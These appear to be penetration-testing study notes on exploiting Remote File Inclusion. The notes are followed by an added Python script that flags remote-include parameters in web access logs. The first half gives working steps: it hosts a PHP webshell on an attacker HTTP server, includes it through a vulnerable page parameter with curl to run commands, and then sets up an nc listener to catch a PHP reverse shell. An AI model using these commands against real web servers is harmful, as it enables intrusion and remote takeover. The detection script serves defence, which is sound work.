Remote File Inclusion (RFI)
First check:
RFI vulnerabilities allow us to include files from a remote system over HTTP or SMB. A common scenario where we'll find this option enabled is a web application that loads files or content from remote systems, e.g. libraries or application data.
# How to exploit this vulnerability.
# We can use the simple-backdoor.php file that ships with Kali Linux in the webshells directory.
locate simple-backdoor.php
# Start an HTTP server in the directory that contains the file.
python3 -m http.server 8000 -d /usr/share/webshells/php/
# Use curl or burpsuite to access the content.
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.213:8000/simple-backdoor.php&cmd=ls"
# We can also gain access to the shell by executing a shell command after the prefix 'cmd='.
# We can run php-reverse-shell.php (≧▽≦)
# If you don't know the underlying system, use this PHP reverse shell code:
# https://github.com/ivan-sincek/php-reverse-shell
# It automatically detects the system and gets the shell.
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Change the IP address and port number.
grep -i "change this" shell.php
# Start the server and run the command as before.
python3 -m http.server 8000
sudo rlwrap nc -lnvp 4444
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.213:8000/shell.php"
# You will get a shell.
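For the defender's view of the requests shown above, the following added example (not part of the original notes) scans web access-log lines for query parameters whose decoded value points at a remote HTTP, FTP or SMB location. The log lines are constructed, and the function names are illustrative assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that name a remote resource: URL scheme, protocol-relative URL, or UNC (SMB) path.
REMOTE_RE = re.compile(r"^\s*(?:(?:https?|ftps?|smb)://|//|\\\\)", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded URL is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(log_line):
    """Return [(parameter, decoded value)] for parameters that carry a remote location."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    pairs = parse_qsl(query, keep_blank_values=True)  # decodes one layer
    decoded = [(name, fully_decode(value)) for name, value in pairs]
    return [(name, value) for name, value in decoded if REMOTE_RE.match(value)]

def scan(lines):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    findings = {}
    for number, line in enumerate(lines, start=1):
        hits = remote_include_params(line)
        if hits:
            findings[number] = hits
    return findings

# Constructed sample log lines (not real traffic); the second mirrors the request above.
SAMPLE_LOG = [
    '198.51.100.9 - - [01/Jan/2024:10:00:00 +0000] "GET /meteor/index.php?page=about.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /meteor/index.php?page=http://192.168.45.213:8000/simple-backdoor.php&cmd=ls HTTP/1.1" 200 77',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /meteor/index.php?page=%2568ttp%253A%252F%252F203.0.113.7%252Fx.php HTTP/1.1" 200 0',
    '198.51.100.9 - - [01/Jan/2024:10:00:12 +0000] "GET /meteor/index.php?page=%5C%5C203.0.113.7%5Cshare%5Cx.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(f"line {number}: {hits}")
```

A parameter that legitimately carries a URL (a redirect target, for example) also matches, so treat a hit as a triage signal and narrow it to the parameter names your application passes to file-loading code.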